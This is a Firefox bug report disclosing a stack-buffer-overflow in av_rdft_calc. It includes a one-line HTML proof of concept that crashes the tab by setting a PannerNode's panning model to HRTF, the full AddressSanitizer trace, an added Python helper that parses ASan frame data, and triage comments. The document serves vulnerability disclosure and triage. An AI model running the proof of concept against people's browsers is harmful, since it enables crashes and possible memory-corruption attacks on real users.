StackOverflow in av_rdft_calc
Categories
(Core :: Web Audio, defect)
People
(Reporter: bin7o8v, Unassigned)
Details
(Keywords: reporter-external)
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Steps to reproduce:
UserAgent: Mozilla/5.0 (X11; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0
- use the command "fuzzfetch -a" to get the latest ASan build.
- serve poc.html on port 8080.
- run the command "./firefox http://127.0.0.1:8080/poc.html".
poc.html
<script>
(new AudioContext()).createPanner().panningModel = "HRTF";
</script>
Actual results:
Tab crashed.
asan log:
==17631==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7f1a269fdfc0 at pc 0x7f1a26ad7d22 bp 0x7f1a269fda00 sp 0x7f1a269fd9f8
READ of size 4 at 0x7f1a269fdfc0 thread T30
#0 0x7f1a26ad7d21 in av_rdft_calc /builds/worker/checkouts/gecko/media/ffvpx/libavcodec/avfft.c:172:9
#1 0x7f1ac91150d5 in GetInverse /builds/worker/workspace/obj-build/dist/include/mozilla/FFTBlock.h:106:5
#2 0x7f1ac91150d5 in extractAverageGroupDelay /builds/worker/checkouts/gecko/dom/media/webaudio/blink/HRTFKernel.cpp:46:19
#3 0x7f1ac91150d5 in WebCore::HRTFKernel::HRTFKernel(float*, unsigned long, float) /builds/worker/checkouts/gecko/dom/media/webaudio/blink/HRTFKernel.cpp:62:18
#4 0x7f1ac9113a21 in create /builds/worker/checkouts/gecko/dom/media/webaudio/blink/HRTFKernel.h:117:11
#5 0x7f1ac9113a21 in WebCore::HRTFElevation::calculateKernelForAzimuthElevation(int, int, SpeexResamplerState_, float) /builds/worker/checkouts/gecko/dom/media/webaudio/blink/HRTFElevation.cpp:153:10
#6 0x7f1ac91103ae in WebCore::HRTFElevation::createBuiltin(int, float) /builds/worker/checkouts/gecko/dom/media/webaudio/blink/HRTFElevation.cpp:225:38
#7 0x7f1ac910fda1 in WebCore::HRTFDatabase::HRTFDatabase(float) /builds/worker/checkouts/gecko/dom/media/webaudio/blink/HRTFDatabase.cpp:55:9
#8 0x7f1ac9112bbe in create /builds/worker/checkouts/gecko/dom/media/webaudio/blink/HRTFDatabase.cpp:45:40
#9 0x7f1ac9112bbe in WebCore::HRTFDatabaseLoader::load() /builds/worker/checkouts/gecko/dom/media/webaudio/blink/HRTFDatabaseLoader.cpp:165:20
#10 0x7f1ac9112ebd in WebCore::databaseLoaderEntry(void) /builds/worker/checkouts/gecko/dom/media/webaudio/blink/HRTFDatabaseLoader.cpp:158:11
#11 0x7f1ae02d211f in _pt_root /builds/worker/checkouts/gecko/nsprpub/pr/src/pthreads/ptthread.c:201:5
#12 0x5612afc134ca in asan_thread_start(void*) /builds/worker/fetches/llvm-project/compiler-rt/lib/asan/asan_interceptors.cpp:225:31
#13 0x7f1ae0094ac2 in start_thread nptl/pthread_create.c:442:8
#14 0x7f1ae012684f misc/../sysdeps/unix/sysv/linux/x86_64/clone3.S:81
Address 0x7f1a269fdfc0 is located in stack of thread T30 at offset 1056 in frame
#0 0x7f1ac91132b7 in WebCore::HRTFElevation::calculateKernelForAzimuthElevation(int, int, SpeexResamplerState_*, float) /builds/worker/checkouts/gecko/dom/media/webaudio/blink/HRTFElevation.cpp:98
This frame has 4 object(s):
[32, 1056) 'response' (line 112) <== Memory access at offset 1056 overflows this variable
[1184, 3248) 'resampled' (line 120)
[3376, 3380) 'in_len' (line 130)
[3392, 3396) 'out_len' (line 131)
HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
(longjmp and C++ exceptions are supported)
Thread T30 created by T0 (Isolated Web Co) here:
#0 0x5612afbfcc6d in pthread_create /builds/worker/fetches/llvm-project/compiler-rt/lib/asan/asan_interceptors.cpp:237:3
#1 0x7f1ae02c0844 in _PR_CreateThread /builds/worker/checkouts/gecko/nsprpub/pr/src/pthreads/ptthread.c:458:14
#2 0x7f1ae02ae43e in PR_CreateThread /builds/worker/checkouts/gecko/nsprpub/pr/src/pthreads/ptthread.c:533:12
#3 0x7f1ac9111fbe in loadAsynchronously /builds/worker/checkouts/gecko/dom/media/webaudio/blink/HRTFDatabaseLoader.cpp:183:28
#4 0x7f1ac9111fbe in WebCore::HRTFDatabaseLoader::createAndLoadAsynchronouslyIfNecessary(float) /builds/worker/checkouts/gecko/dom/media/webaudio/blink/HRTFDatabaseLoader.cpp:66:11
#5 0x7f1ac90dae9f in CreateHRTFPanner /builds/worker/checkouts/gecko/dom/media/webaudio/PannerNode.cpp:102:9
#6 0x7f1ac90dae9f in mozilla::dom::PannerNode::SetPanningModel(mozilla::dom::PanningModelType) /builds/worker/checkouts/gecko/dom/media/webaudio/PannerNode.cpp:350:55
#7 0x7f1ac526044c in mozilla::dom::PannerNode_Binding::set_panningModel(JSContext*, JS::Handle<JSObject*>, void*, JSJitSetterCallArgs) /builds/worker/workspace/obj-build/dom/bindings/./PannerNodeBinding.cpp:482:24
#8 0x7f1ac6bfec8d in bool mozilla::dom::binding_detail::GenericSetter<mozilla::dom::binding_detail::NormalThisPolicy>(JSContext*, unsigned int, JS::Value*) /builds/worker/checkouts/gecko/dom/bindings/BindingUtils.cpp:3206:8
#9 0x7f1ad06f6115 in CallJSNative /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:480:13
#10 0x7f1ad06f6115 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:574:12
#11 0x7f1ad06f8206 in InternalCall /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:641:10
#12 0x7f1ad06f8206 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:673:8
#13 0x7f1ad06fa283 in js::CallSetter(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::Handle<JS::Value>) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:804:10
#14 0x7f1ad0b0ac37 in SetExistingProperty(JSContext*, JS::Handle<JS::PropertyKey>, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::Handle<js::NativeObject*>, js::PropertyResult const&, JS::ObjectOpResult&) /builds/worker/checkouts/gecko/js/src/vm/NativeObject.cpp:2655:8
#15 0x7f1ad0b07715 in bool js::NativeSetProperty<(js::QualifiedBool)1>(JSContext*, JS::Handle<js::NativeObject*>, JS::Handle<JS::PropertyKey>, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::ObjectOpResult&) /builds/worker/checkouts/gecko/js/src/vm/NativeObject.cpp:2689:14
#16 0x7f1ad0715004 in SetProperty /builds/worker/checkouts/gecko/js/src/vm/ObjectOperations-inl.h:305:10
#17 0x7f1ad0715004 in SetObjectElementOperation /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:1594:10
#18 0x7f1ad0715004 in js::Interpret(JSContext*, js::RunState&) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:2807:12
#19 0x7f1ad06f4e97 in MaybeEnterInterpreterTrampoline /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:394:10
#20 0x7f1ad06f4e97 in js::RunScript(JSContext*, js::RunState&) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:452:13
#21 0x7f1ad06fa7a3 in js::ExecuteKernel(JSContext*, JS::Handle<JSScript*>, JS::Handle<JSObject*>, js::AbstractFramePtr, JS::MutableHandle<JS::Value>) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:839:13
#22 0x7f1ad08cf515 in JS_ExecuteScript(JSContext*, JS::Handle<JSScript*>) /builds/worker/checkouts/gecko/js/src/vm/CompilationAndEvaluation.cpp:518:10
#23 0x7f1ac46ff6f9 in mozilla::dom::JSExecutionContext::ExecScript() /builds/worker/checkouts/gecko/dom/base/JSExecutionContext.cpp:234:8
#24 0x7f1acaecf790 in ExecuteCompiledScript /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:2503:16
#25 0x7f1acaecf790 in mozilla::dom::ScriptLoader::EvaluateScript(nsIGlobalObject*, JS::loader::ScriptLoadRequest*) /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:2792:12
#26 0x7f1acaecd888 in mozilla::dom::ScriptLoader::EvaluateScriptElement(JS::loader::ScriptLoadRequest*) /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:2572:10
#27 0x7f1acaec30a1 in mozilla::dom::ScriptLoader::ProcessRequest(JS::loader::ScriptLoadRequest*) /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:2215:10
#28 0x7f1acaebf131 in mozilla::dom::ScriptLoader::ProcessInlineScript(nsIScriptElement*, JS::loader::ScriptKind) /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:1464:10
#29 0x7f1acaea6c0d in mozilla::dom::ScriptLoader::ProcessScriptElement(nsIScriptElement*) /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:1053:10
#30 0x7f1acaea5c7b in mozilla::dom::ScriptElement::MaybeProcessScript() /builds/worker/checkouts/gecko/dom/script/ScriptElement.cpp:195:18
#31 0x7f1ac312e09d in AttemptToExecute /builds/worker/workspace/obj-build/dist/include/nsIScriptElement.h:224:18
#32 0x7f1ac312e09d in nsHtml5TreeOpExecutor::RunScript(nsIContent*, bool) /builds/worker/checkouts/gecko/parser/html/nsHtml5TreeOpExecutor.cpp:957:22
#33 0x7f1ac312820f in nsHtml5TreeOpExecutor::RunFlushLoop() /builds/worker/checkouts/gecko/parser/html/nsHtml5TreeOpExecutor.cpp:742:7
#34 0x7f1ac3135b4e in nsHtml5ExecutorFlusher::Run() /builds/worker/checkouts/gecko/parser/html/nsHtml5StreamParser.cpp:173:18
#35 0x7f1ac0cba39a in mozilla::RunnableTask::Run() /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:578:16
#36 0x7f1ac0ca2e5b in mozilla::TaskController::DoExecuteNextTaskOnlyMainThreadInternal(mozilla::detail::BaseAutoLock<mozilla::Mutex&> const&) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:905:26
#37 0x7f1ac0c9fa38 in mozilla::TaskController::ExecuteNextTaskOnlyMainThreadInternal(mozilla::detail::BaseAutoLock<mozilla::Mutex&> const&) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:728:15
#38 0x7f1ac0ca0139 in mozilla::TaskController::ProcessPendingMTTask(bool) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:514:36
#39 0x7f1ac0cc2491 in operator() /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:232:37
#40 0x7f1ac0cc2491 in mozilla::detail::RunnableFunction<mozilla::TaskController::TaskController()::$_0>::Run() /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.h:548:5
#41 0x7f1ac0cea41f in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1199:16
#42 0x7f1ac0cf815a in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:480:10
#43 0x7f1ac27bdf98 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:85:21
#44 0x7f1ac26027aa in RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:370:10
#45 0x7f1ac26027aa in RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:363:3
#46 0x7f1ac26027aa in MessageLoop::Run() /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:345:3
#47 0x7f1acb4bcc29 in nsBaseAppShell::Run() /builds/worker/checkouts/gecko/widget/nsBaseAppShell.cpp:148:27
#48 0x7f1acb6c5152 in nsAppShell::Run() /builds/worker/checkouts/gecko/widget/gtk/nsAppShell.cpp:470:33
#49 0x7f1ad03125ee in XRE_RunAppShell() /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:712:20
#50 0x7f1ac26027aa in RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:370:10
#51 0x7f1ac26027aa in RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:363:3
#52 0x7f1ac26027aa in MessageLoop::Run() /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:345:3
#53 0x7f1ad0311c75 in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:647:34
#54 0x5612afc56e6b in content_process_main /builds/worker/checkouts/gecko/browser/app/../../ipc/contentproc/plugin-container.cpp:57:28
#55 0x5612afc56e6b in main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:375:18
#56 0x7f1ae0029d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
SUMMARY: AddressSanitizer: stack-buffer-overflow /builds/worker/checkouts/gecko/media/ffvpx/libavcodec/avfft.c:172:9 in av_rdft_calc
==17631==ABORTING
Expected results:
Tab should not crash.
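A small triage helper, added here and not part of the report or of Firefox: it reads the frame description that ASan prints for a stack-buffer-overflow (the "located in stack ... at offset N in frame" line and the object list that follows) and works out which stack object the access ran off and by how many bytes. The embedded excerpt is constructed from the lines of this report.

```python
import re
from dataclasses import dataclass

# Constructed excerpt: the relevant lines of the report above, not a new run.
ASAN_EXCERPT = """\
==17631==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7f1a269fdfc0
READ of size 4 at 0x7f1a269fdfc0 thread T30
Address 0x7f1a269fdfc0 is located in stack of thread T30 at offset 1056 in frame
This frame has 4 object(s):
  [32, 1056) 'response' (line 112) <== Memory access at offset 1056 overflows this variable
  [1184, 3248) 'resampled' (line 120)
  [3376, 3380) 'in_len' (line 130)
  [3392, 3396) 'out_len' (line 131)
"""


@dataclass
class StackOverflow:
    access: str      # "READ" or "WRITE"
    size: int        # bytes touched by the faulting access
    offset: int      # frame offset of the faulting address
    var: str         # stack object the access runs off the end of
    begin: int       # object bounds within the frame, [begin, end)
    end: int
    past_end: int    # bytes between the object's end and the start of the access
    index: int       # element index, assuming the object holds `size`-byte elements


def parse_stack_overflow(report: str) -> StackOverflow:
    """Locate the overflowed stack object from an ASan stack-buffer-overflow report."""
    acc = re.search(r"^(READ|WRITE) of size (\d+)", report, re.M)
    off = re.search(r"at offset (\d+) in frame", report)
    objs = re.findall(r"\[(\d+), (\d+)\) '([^']+)' \(line (\d+)\)", report)
    if not (acc and off and objs):
        raise ValueError("not a stack-buffer-overflow report with a frame description")
    access, size, offset = acc.group(1), int(acc.group(2)), int(off.group(1))
    # The faulting address sits in a redzone, so take the nearest object that ends at or before it.
    cands = [(int(b), int(e), n) for b, e, n, _ in objs if int(e) <= offset]
    if not cands:
        raise ValueError("access lies before every object in the frame (underflow?)")
    begin, end, var = max(cands, key=lambda c: c[1])
    return StackOverflow(access, size, offset, var, begin, end,
                         past_end=offset - end, index=(offset - begin) // size)


if __name__ == "__main__":
    f = parse_stack_overflow(ASAN_EXCERPT)
    print(f"{f.access} of {f.size} bytes at frame offset {f.offset}: '{f.var}' [{f.begin}, {f.end}) "
          f"overrun by {f.past_end} bytes; element index {f.index} of {(f.end - f.begin) // f.size}")
```

For this report it resolves to 'response', with the 4-byte read starting exactly at the first byte past the object, i.e. element 256 of a 256-element array of 4-byte values.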
Comment 1•1 year ago
The Bugbug bot thinks this bug should belong to the 'Core::Web Audio' component, and is moving the bug to that component. Please correct in case you think the bot is wrong.
Updated•1 year ago
Updated•1 year ago
Comment 3•1 year ago
Thanks for reporting, I've duped it against our similar internal report for the same problem.
Comment 4•1 year ago
Sorry for the burst of bugspam: filter on tinkling-glitter-filtrate
Adding reporter-external keyword to security bugs found by non-employees for accounting reasons
Updated•10 months ago